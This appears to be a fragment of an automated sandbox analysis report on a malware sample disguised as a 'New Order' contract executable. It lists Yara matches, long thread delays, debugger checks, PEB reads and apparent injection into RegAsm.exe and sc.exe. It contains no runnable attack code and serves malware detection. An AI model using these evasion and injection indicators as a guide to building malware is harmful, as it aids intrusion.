                Source: Yara matchFile source: 00000000.00000002.1720676508.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: New Order - RCII900718_Contract Drafting.exe PID: 1892, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Memory allocated: F10000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Memory allocated: 28B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Memory allocated: 48B0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0289096E rdtsc 1_2_0289096E
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\sc.exe Window / User API: threadDelayed 4150
                Source: C:\Windows\SysWOW64\sc.exe Window / User API: threadDelayed 5823
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\sc.exe API coverage: 2.6 %
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe TID: 2916 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\sc.exe TID: 2656 Thread sleep count: 4150 > 30
                Source: C:\Windows\SysWOW64\sc.exe TID: 2656 Thread sleep time: -8300000s >= -30000s
                Source: C:\Windows\SysWOW64\sc.exe TID: 2656 Thread sleep count: 5823 > 30
                Source: C:\Windows\SysWOW64\sc.exe TID: 2656 Thread sleep time: -11646000s >= -30000s
                Source: C:\Windows\SysWOW64\sc.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\sc.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F2CA10 FindFirstFileW,FindNextFileW,FindClose,6_2_02F2CA10
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721970485.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721970485.0000000003AD8000.00000004.00000800.00020000.00000000.sdmp, New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721970485.000000000397D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %Q8DF/d6IEvcmRxK/iqxe0yLE/4ixU1vcltilIl%IY6Ul%8QemudZZ%7DFxhQyuY1PM74qlv5Esy
                Source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721970485.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: iUYZ%tz+5ovrFRKmMAQ8DF/d6IEvcmRxK/iqxe0yLE/4ixU1vcltilIl%IY6Ul%8QemudZZ%7DFxhQyuY1PM74qlv5EsyT9e5i
                Source: sc.exe, 00000006.00000002.2977665984.000000000325E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
                Source: ZrTbKDhAWYKJu.exe, 00000007.00000002.2978554766.00000000007CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000008.00000002.2536722694.00000248A9E7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\sc.exe Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_00417DA3 LdrLoadDll, 1_2_00417DA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288E284 mov eax, dword ptr fs:[00000030h] 1_2_0288E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02854690 mov eax, dword ptr fs:[00000030h]1_2_02854690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288C6A6 mov eax, dword ptr fs:[00000030h]1_2_0288C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028866B0 mov eax, dword ptr fs:[00000030h]1_2_028866B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0288A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288A6C7 mov eax, dword ptr fs:[00000030h]1_2_0288A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D06F1 mov eax, dword ptr fs:[00000030h]1_2_028D06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D06F1 mov eax, dword ptr fs:[00000030h]1_2_028D06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CE6F2 mov eax, dword ptr fs:[00000030h]1_2_028CE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CE6F2 mov eax, dword ptr fs:[00000030h]1_2_028CE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CE6F2 mov eax, dword ptr fs:[00000030h]1_2_028CE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CE6F2 mov eax, dword ptr fs:[00000030h]1_2_028CE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CE609 mov eax, dword ptr fs:[00000030h]1_2_028CE609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286260B mov eax, dword ptr fs:[00000030h]1_2_0286260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286260B mov eax, dword ptr fs:[00000030h]1_2_0286260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286260B mov eax, dword ptr fs:[00000030h]1_2_0286260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286260B mov eax, dword ptr fs:[00000030h]1_2_0286260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286260B mov eax, dword ptr fs:[00000030h]1_2_0286260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286260B mov eax, dword ptr fs:[00000030h]1_2_0286260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286260B mov eax, dword ptr fs:[00000030h]1_2_0286260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892619 mov eax, dword ptr fs:[00000030h]1_2_02892619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286E627 mov eax, dword ptr fs:[00000030h]1_2_0286E627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02886620 mov eax, dword ptr fs:[00000030h]1_2_02886620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02888620 mov eax, dword ptr fs:[00000030h]1_2_02888620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285262C mov eax, dword ptr fs:[00000030h]1_2_0285262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286C640 mov eax, dword ptr fs:[00000030h]1_2_0286C640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288A660 mov eax, dword ptr fs:[00000030h]1_2_0288A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288A660 mov eax, dword ptr fs:[00000030h]1_2_0288A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02882674 mov eax, dword ptr fs:[00000030h]1_2_02882674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291866E mov eax, dword ptr fs:[00000030h]1_2_0291866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291866E mov eax, dword ptr fs:[00000030h]1_2_0291866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F678E mov eax, dword ptr fs:[00000030h]1_2_028F678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028507AF mov eax, dword ptr fs:[00000030h]1_2_028507AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029047A0 mov eax, dword ptr fs:[00000030h]1_2_029047A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285C7C0 mov eax, dword ptr fs:[00000030h]1_2_0285C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D07C3 mov eax, dword ptr fs:[00000030h]1_2_028D07C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028727ED mov eax, dword ptr fs:[00000030h]1_2_028727ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028727ED mov eax, dword ptr fs:[00000030h]1_2_028727ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028727ED mov eax, dword ptr fs:[00000030h]1_2_028727ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028DE7E1 mov eax, dword ptr fs:[00000030h]1_2_028DE7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028547FB mov eax, dword ptr fs:[00000030h]1_2_028547FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028547FB mov eax, dword ptr fs:[00000030h]1_2_028547FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288C700 mov eax, dword ptr fs:[00000030h]1_2_0288C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02850710 mov eax, dword ptr fs:[00000030h]1_2_02850710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02880710 mov eax, dword ptr fs:[00000030h]1_2_02880710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288C720 mov eax, dword ptr fs:[00000030h]1_2_0288C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288C720 mov eax, dword ptr fs:[00000030h]1_2_0288C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288273C mov eax, dword ptr fs:[00000030h]1_2_0288273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288273C mov ecx, dword ptr fs:[00000030h]1_2_0288273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288273C mov eax, dword ptr fs:[00000030h]1_2_0288273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CC730 mov eax, dword ptr fs:[00000030h]1_2_028CC730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288674D mov esi, dword ptr fs:[00000030h]1_2_0288674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288674D mov eax, dword ptr fs:[00000030h]1_2_0288674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288674D mov eax, dword ptr fs:[00000030h]1_2_0288674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028DE75D mov eax, dword ptr fs:[00000030h]1_2_028DE75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02850750 mov eax, dword ptr fs:[00000030h]1_2_02850750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D4755 mov eax, dword ptr fs:[00000030h]1_2_028D4755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892750 mov eax, dword ptr fs:[00000030h]1_2_02892750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892750 mov eax, dword ptr fs:[00000030h]1_2_02892750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02858770 mov eax, dword ptr fs:[00000030h]1_2_02858770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0290A49A mov eax, dword ptr fs:[00000030h]1_2_0290A49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028564AB mov eax, dword ptr fs:[00000030h]1_2_028564AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028844B0 mov ecx, dword ptr fs:[00000030h]1_2_028844B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028DA4B0 mov eax, dword ptr fs:[00000030h]1_2_028DA4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028504E5 mov ecx, dword ptr fs:[00000030h]1_2_028504E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02888402 mov eax, dword ptr fs:[00000030h]1_2_02888402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02888402 mov eax, dword ptr fs:[00000030h]1_2_02888402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02888402 mov eax, dword ptr fs:[00000030h]1_2_02888402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284C427 mov eax, dword ptr fs:[00000030h]1_2_0284C427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284E420 mov eax, dword ptr fs:[00000030h]1_2_0284E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284E420 mov eax, dword ptr fs:[00000030h]1_2_0284E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284E420 mov eax, dword ptr fs:[00000030h]1_2_0284E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h]1_2_028D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h]1_2_028D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h]1_2_028D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h]1_2_028D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h]1_2_028D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h]1_2_028D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h]1_2_028D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0290A456 mov eax, dword ptr fs:[00000030h]1_2_0290A456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h]1_2_0288E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h]1_2_0288E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h]1_2_0288E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h]1_2_0288E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h]1_2_0288E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h]1_2_0288E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h]1_2_0288E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h]1_2_0288E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284645D mov eax, dword ptr fs:[00000030h]1_2_0284645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287245A mov eax, dword ptr fs:[00000030h]1_2_0287245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028DC460 mov ecx, dword ptr fs:[00000030h]1_2_028DC460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287A470 mov eax, dword ptr fs:[00000030h]1_2_0287A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287A470 mov eax, dword ptr fs:[00000030h]1_2_0287A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287A470 mov eax, dword ptr fs:[00000030h]1_2_0287A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02884588 mov eax, dword ptr fs:[00000030h]1_2_02884588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02852582 mov eax, dword ptr fs:[00000030h]1_2_02852582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02852582 mov ecx, dword ptr fs:[00000030h]1_2_02852582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E59C mov eax, dword ptr fs:[00000030h]1_2_0288E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D05A7 mov eax, dword ptr fs:[00000030h]1_2_028D05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D05A7 mov eax, dword ptr fs:[00000030h]1_2_028D05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D05A7 mov eax, dword ptr fs:[00000030h]1_2_028D05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028745B1 mov eax, dword ptr fs:[00000030h]1_2_028745B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028745B1 mov eax, dword ptr fs:[00000030h]1_2_028745B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E5CF mov eax, dword ptr fs:[00000030h]1_2_0288E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E5CF mov eax, dword ptr fs:[00000030h]1_2_0288E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028565D0 mov eax, dword ptr fs:[00000030h]1_2_028565D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288A5D0 mov eax, dword ptr fs:[00000030h]1_2_0288A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288A5D0 mov eax, dword ptr fs:[00000030h]1_2_0288A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h]1_2_0287E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h]1_2_0287E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h]1_2_0287E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h]1_2_0287E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h]1_2_0287E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h]1_2_0287E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h]1_2_0287E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h]1_2_0287E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028525E0 mov eax, dword ptr fs:[00000030h]1_2_028525E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288C5ED mov eax, dword ptr fs:[00000030h]1_2_0288C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288C5ED mov eax, dword ptr fs:[00000030h]1_2_0288C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E6500 mov eax, dword ptr fs:[00000030h]1_2_028E6500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02924500 mov eax, dword ptr fs:[00000030h]1_2_02924500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02924500 mov eax, dword ptr fs:[00000030h]1_2_02924500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02924500 mov eax, dword ptr fs:[00000030h]1_2_02924500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02924500 mov eax, dword ptr fs:[00000030h]1_2_02924500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02924500 mov eax, dword ptr fs:[00000030h]1_2_02924500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02924500 mov eax, dword ptr fs:[00000030h]1_2_02924500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02924500 mov eax, dword ptr fs:[00000030h]1_2_02924500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860535 mov eax, dword ptr fs:[00000030h]1_2_02860535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860535 mov eax, dword ptr fs:[00000030h]1_2_02860535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860535 mov eax, dword ptr fs:[00000030h]1_2_02860535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860535 mov eax, dword ptr fs:[00000030h]1_2_02860535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860535 mov eax, dword ptr fs:[00000030h]1_2_02860535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860535 mov eax, dword ptr fs:[00000030h]1_2_02860535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E53E mov eax, dword ptr fs:[00000030h]1_2_0287E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E53E mov eax, dword ptr fs:[00000030h]1_2_0287E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E53E mov eax, dword ptr fs:[00000030h]1_2_0287E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E53E mov eax, dword ptr fs:[00000030h]1_2_0287E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E53E mov eax, dword ptr fs:[00000030h]1_2_0287E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02858550 mov eax, dword ptr fs:[00000030h]1_2_02858550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02858550 mov eax, dword ptr fs:[00000030h]1_2_02858550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288656A mov eax, dword ptr fs:[00000030h]1_2_0288656A
